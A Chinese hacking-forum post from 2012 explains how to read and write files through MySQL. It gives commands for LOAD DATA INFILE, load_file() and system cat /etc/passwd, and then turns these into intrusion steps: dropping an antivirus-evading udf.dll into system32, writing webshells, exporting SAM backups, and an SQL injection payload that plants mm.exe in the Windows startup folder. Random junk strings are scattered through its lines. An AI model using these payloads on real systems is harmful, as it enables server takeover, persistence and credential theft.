中国网络渗透测试联盟

标题: mysql下读取文件的几种方式 [打印本页]

作者: admin    时间: 2012-9-13 16:34
标题: mysql下读取文件的几种方式
今天朋友问我如何在mysql下读取文件,把我问愣了,发现自己还是犯了不求甚解的毛病,因此特地查了下mysql使用手册。 ( T3 x3 V' C: p
思路都一样,在拥有file权限的前提下,读取文件为字符串形式插入表中,然后读出表中数据,只是方式略有不同 " p6 o1 T! |7 X7 h
( a$ g6 _6 P3 Q9 N
mysql3.x下 / v+ a7 Z& D4 [- {4 \. f
! J$ w5 [3 Z% {6 C) Z+ M4 m2 {) A
不确定mysql3.x下能否使用load_file()函数(我在mysql3使用手册上没有查到,但貌似是可以的),用 load data infile 读取文件,命令如下 - E1 S  ^+ m, e5 {  l9 x
. v/ `8 K0 e8 h$ X! x# y' |
mysql>create table a (cmd text);
4 O1 x7 ~' e2 n* vmysql>load data infile 'c:\\boot.ini' into table a;
" S1 H" L9 F, I* W5 D/ W2 H3 A1 Zmysql>select * from a; 4 m* T8 L4 L# r

1 s, o6 U0 h5 u* g5 r6 xmysql4.x下 . N/ n! \% J7 B4 c0 i" V4 }

4 M  o: m1 Q3 `4 u+ d& V1 qmysql4.x下除了 load data infile 外还可以用大家熟知的 load_file() 来读取,命令如下
: K  Q4 a+ b' N# D8 z
9 H, X6 o- _: Dmysql>create table a (cmd text);
% g+ d9 h# S( I3 l. qmysql>insert into a (cmd) values (load_file('c:\\boot.ini'));
$ \. i! `: q( c9 l/ omysql>select * from a; : I0 e' S, k) H/ ?8 b, V0 {

' S* W# L2 [2 I, g- ]; Omysql5.x下 ! P' Q; z/ e* m

) V8 I7 A4 R) P3 o在linux下,mysql5.x 除了上面两种方法,还可以利用 system 直接执行系统命令的方式来读取文件(是否必须root身份不确定,未测试),命令如下 3 }: L+ {4 Z: a5 j: \1 a
" y2 k" i1 N8 g6 `7 l
mysql>system cat /etc/passwd
7 `7 ~$ s1 Z) x/ u8 K
; s6 U, G+ ~5 x+ F  L
$ \& H# ~' C+ P. Z& rmysql下读取文件在入侵中用到的时候不多,可能用于查询配置文件寻找web路径,或者webshell权限很小的时候读取其他格式的webshell内容然后用into outfile方式写入大马等,二进制文件也可以这样用,只是多了hex()和unhex()的工序。
! v+ m4 W/ u, [' Z- o, U/ }/ o; z2 P7 J- p
0 |9 S+ r: j# y- a  G
例:把免杀过的udf.dll文件插入系统目录
# y+ O! u; ~; i+ D/ Q9 I; r9 ^& e' A' h& h- X- X/ }
create table a (cmd LONGBLOB); . E, p! o6 b3 b7 ^8 U( P$ d' U$ Q: b
insert into a (cmd) values (hex(load_file('c:\\windows\\temp\\udf.dll')));
. b1 ?- i( n2 n% ]SELECT unhex(cmd) FROM a INTO DUMPFILE 'c:\\windows\\system32\\udf.dll';
! d& z1 }+ O( M% _* ^& ~( P5 w' `& {
其他的利用方法也很多,如把木马文件写入启动项,或者把加工过的cmd.exe文件导出到系统根目录下,把sam备份导出到可读目录等等,注入中应该也可以这样用(在不知道web路径又可以导出文件的情况下),大家自由发挥吧。 0 X& F8 Q! B$ h$ m

$ u& C+ p( x8 y3 m
* t( D  _8 ?- N1 w! H, y' P注入中的语法(未测试)
$ N# e' A1 E' b/ V
; Z4 a8 a6 |1 J, o* o" f9 a& r2 l8 W# V( h
id=xxx and 1=2 union select 1,2,3,unhex(mm.exe的十六进制),5 INTO DUMPFILE 'C:\\Documents and Settings\\All Users\\「开始」菜单\程序\启动\\mm.exe'/*




欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2